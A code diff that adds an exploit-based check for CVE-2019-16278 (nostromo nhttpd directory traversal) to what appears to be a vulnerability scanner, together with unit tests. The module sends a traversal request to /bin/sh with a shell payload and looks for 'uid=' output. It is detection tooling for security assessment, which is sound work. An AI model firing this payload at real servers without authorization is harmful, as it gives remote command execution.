diff --git a/agent/exploits/cve_2019_16278.py b/agent/exploits/cve_2019_16278.py new file mode 100644 index 0000000..d7a306d --- /dev/null +++ b/agent/exploits/cve_2019_16278.py @@ -0,0 +1,90 @@ +"""Agent Asteroid implementation for CVE-2019-16278""" + +import datetime +from urllib import parse as urlparse + +import requests +from requests import exceptions as requests_exceptions + +from agent import definitions +from agent import exploits_registry +from agent.exploits import webexploit + +VULNERABILITY_TITLE = "NOSTROMO NHTTPD DIRECTORY TRAVERSAL VULNERABILITY" +VULNERABILITY_REFERENCE = "CVE-2019-16278" +VULNERABILITY_DESCRIPTION = """Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request. +""" +RISK_RATING = "CRITICAL" + +DEFAULT_TIMEOUT = datetime.timedelta(seconds=90) + + +@exploits_registry.register +class CVE201916278Exploit(webexploit.WebExploit): + accept_request = definitions.Request(method="GET", path="/") + + metadata = definitions.VulnerabilityMetadata( + title=VULNERABILITY_TITLE, + description=VULNERABILITY_DESCRIPTION, + reference=VULNERABILITY_REFERENCE, + risk_rating=RISK_RATING, + ) + + def accept(self, target: definitions.Target) -> bool: + """Rule: heuristically detect if a specific target is valid. + + Args: + target: Target to verify + + Returns: + True if the target is valid; otherwise False. + """ + target_endpoint = urlparse.urljoin(target.origin, self.accept_request.path) + try: + req = requests.Request( + method=self.accept_request.method, + url=target_endpoint, + data=self.accept_request.data, + ).prepare() + resp = self.session.send(req, timeout=DEFAULT_TIMEOUT.seconds) + except requests_exceptions.RequestException: + return False + + server_header = resp.headers.get("Server", "") + return "nostromo" in server_header + + def check(self, target: definitions.Target) -> list[definitions.Vulnerability]: + """Rule to detect specific vulnerability on a specific target. + + Args: + target: Target to scan + + Returns: + List of identified vulnerabilities. + """ + vulnerabilities: list[definitions.Vulnerability] = [] + + target_endpoint = urlparse.urljoin( + target.origin, "/.%0d./.%0d./.%0d./.%0d./bin/sh" + ) + payload = "echo\necho\n id 2>&1" + + # Force HTTP/1.0 + self.session._http_vsn = 10 + self.session._http_vsn_str = "HTTP/1.0" + try: + req = requests.Request( + method="POST", url=target_endpoint, data=payload + ).prepare() + resp = self.session.send( + req, + timeout=DEFAULT_TIMEOUT.seconds, + ) + except requests_exceptions.RequestException: + return vulnerabilities + + if "uid=" in resp.text: + vulnerability = self._create_vulnerability(target) + vulnerabilities.append(vulnerability) + + return vulnerabilities diff --git a/tests/exploits/cve_2019_16278_test.py b/tests/exploits/cve_2019_16278_test.py new file mode 100644 index 0000000..58aa3ef --- /dev/null +++ b/tests/exploits/cve_2019_16278_test.py @@ -0,0 +1,79 @@ +"""Unit tests for Agent Asteroid: CVE-2019-16278""" + +import requests_mock as req_mock + +from agent import definitions +from agent.exploits import cve_2019_16278 + + +def testCVE201916278_whenVulnerable_reportFinding( + requests_mock: req_mock.mocker.Mocker, +) -> None: + """CVE-2019-16278 unit test: case when target is vulnerable.""" + requests_mock.get( + url="http://localhost:80/", + status_code=200, + headers={"Server": "nostromo 1.9.4"}, + ) + requests_mock.post( + "http://localhost:80/.%0D./.%0D./.%0D./.%0D./bin/sh", + text="uid=65534 gid=65534", + status_code=200, + ) + exploit_instance = cve_2019_16278.CVE201916278Exploit() + target = definitions.Target("http", "localhost", 80) + + accept = exploit_instance.accept(target) + vulnerabilities = exploit_instance.check(target) + + assert accept is True + vulnerability = vulnerabilities[0] + assert ( + vulnerability.entry.title == "NOSTROMO NHTTPD DIRECTORY TRAVERSAL VULNERABILITY" + ) + assert vulnerability.technical_detail == ( + "http://localhost:80 is vulnerable to CVE-2019-16278, NOSTROMO NHTTPD DIRECTORY TRAVERSAL VULNERABILITY" + ) + + +def testCVE201916278_whenSafe_reportNothing( + requests_mock: req_mock.mocker.Mocker, +) -> None: + """CVE-2019-16278 unit test: case when target is safe.""" + exploit_instance = cve_2019_16278.CVE201916278Exploit() + requests_mock.get( + url="http://localhost:80/", + status_code=200, + headers={"Server": "nostromo 1.9.4"}, + ) + requests_mock.post( + "http://localhost:80/.%0D./.%0D./.%0D./.%0D./bin/sh", + status_code=404, + ) + target = definitions.Target("http", "localhost", 80) + + accept = exploit_instance.accept(target) + vulnerabilities = exploit_instance.check(target) + + assert accept is True + assert len(vulnerabilities) == 0 + + +def testCVE201916278_whenAcceptRequestFails_doNotCrash() -> None: + """CVE-2019-16278 unit test: case when target is safe.""" + exploit_instance = cve_2019_16278.CVE201916278Exploit() + target = definitions.Target("http", "notexist", 80) + + accept = exploit_instance.accept(target) + + assert accept is False + + +def testCVE201916278_whenCheckRequestFails_doNotCrash() -> None: + """CVE-2019-16278 unit test: case when target is safe.""" + exploit_instance = cve_2019_16278.CVE201916278Exploit() + target = definitions.Target("http", "notexist", 80) + + vulnerabilities = exploit_instance.check(target) + + assert len(vulnerabilities) == 0